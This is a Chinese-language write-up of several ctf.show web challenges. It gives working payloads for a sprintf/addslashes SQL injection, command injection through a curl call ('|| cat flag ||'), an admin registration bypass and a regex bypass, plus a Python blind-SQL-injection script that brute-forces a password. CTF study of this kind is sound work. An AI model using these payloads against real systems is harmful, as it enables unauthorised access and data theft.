给她
打开网页,网页内容如下
登陆就能进入下一关
??where is 参数??
当前执行的SQL语句为:select * from user where name='' and pass=''
扫一下发现有好多.git相关的目录,在结合题目给她想到了git泄露
用工具githack扫一下得到hint.php这个文件,内容如下
<?php
$pass=sprintf("and pass='%s'",addslashes($_GET['pass']));
$sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name']));
?>
sprintf格式化字符串漏洞,就是sprintf会将不认识的字符置为空,这里利用sprintf这个功能去将addslashes这个函数会将单引号和双引号用转义字符/转义所以最终playload
?name=admin&pass=%1$' or 1=1--+
addslashes会将'这个字符进行转义,而转义之后就构成了%1$\' or 1=1 --+
而sprintf不认识这个%1$\这个字符就会将它置为空
签到题
打开网页,得到源码
<?php
if(isset($_GET['url'])){
system("curl https://".$_GET['url'].".ctf.show");
}else{
show_source(__FILE__);
}
?>
关于curl的命令执行
?url=|| ls ||
?url=|| cat flag ||
即可得到flag
假赛生
打开网页,得到源码
<?php
session_start();
include('config.php');
if(empty($_SESSION['name'])){
show_source("index.php");
}else{
$name=$_SESSION['name'];
$sql='select pass from user where name="'.$name.'"';
echo $sql."<br />";
system('4rfvbgt56yhn.sh');
$query=mysqli_query($conn,$sql);
$result=mysqli_fetch_assoc($query);
if($name==='admin'){
echo "admin!!!!!"."<br />";
if(isset($_GET['c'])){
preg_replace_callback("/\w\W*/",function(){die("not allowed!");},$_GET['c'],1);
echo $flag;
}else{
echo "you not admin";
}
}
}
?>
在题目已经提示了有两个页面,一个是register.php,一个是login.php去访问这两个页面,访问之后一个是注册页面,一个是登录页面,在注册页面用admin发现注册不成功,用admin+空格发现能够注册成功了,在用admin和你注册的密码进行登录发现能够登录成功,登录之后,我们在回过头开始分析代码,一个最重要的代码就是
preg_replace_callback("/\w\W*/",function(){die("not allowed!");},$_GET['c'],1);
这个正则表达式过滤
这个w和小写的W把全部字符都给过滤了,这就利用一个新的姿势,就是用不输入进行过滤
?c=""
这样就可以绕过正则得到flag
萌新记忆
打开网页可以看到四个小故事,但小故事没有啥用,用字典扫一下,得到了admin这个目录,访问一下获得一个登录页面,这里有三种情况,通过测试得到密码是17位,直接上脚本进行爆破,测试语句'||length(p)<'5
import requests
flag = ''
for i in range(1, 18):
for j in '0123456789abcdefghijklmnopqrstuvwxyz':
url = "http://daabc47e-58a5-44d9-9838-9767cefb49f4.chall.ctf.show/admin/checklogin.php"
data = {"u": "'||substr(p,{},1)<'{}".format(i,j),
"p": ""
}
# print(data)
c = requests.post(url, data=data)
# print(c.text)
if '用户名' not in c.text:
flag += chr(ord(j)-1)
print(flag)
break